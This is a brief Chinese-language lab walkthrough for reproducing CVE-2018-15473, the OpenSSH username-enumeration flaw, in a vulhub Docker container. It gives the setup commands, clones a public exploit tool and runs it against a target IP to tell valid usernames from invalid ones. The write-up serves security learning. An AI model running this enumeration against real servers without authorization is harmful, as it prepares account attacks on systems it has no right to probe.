前言
OpenSSH 7.7前存在一個用戶名枚舉漏洞,通過該漏洞,攻擊者可以判斷某個用戶名是否存在於目標主機中。
已經通過Github公開
https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
環境搭建
cd vulhub/openssh/CVE-2018-15473
docker-compose build && docker-compose up -d
環境啓動後,我們在客戶端執行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p20022,輸入密碼vulhub,即可登錄到容器中。
漏洞復現
下載工具
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git
使用CVE-2018-15473-Exploit,枚舉字典中的用戶名:
python3 sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt your-ip
可見,root、example、vulhub、nobody是存在的用戶,rootInvalid、user、phithon是不存在的用戶。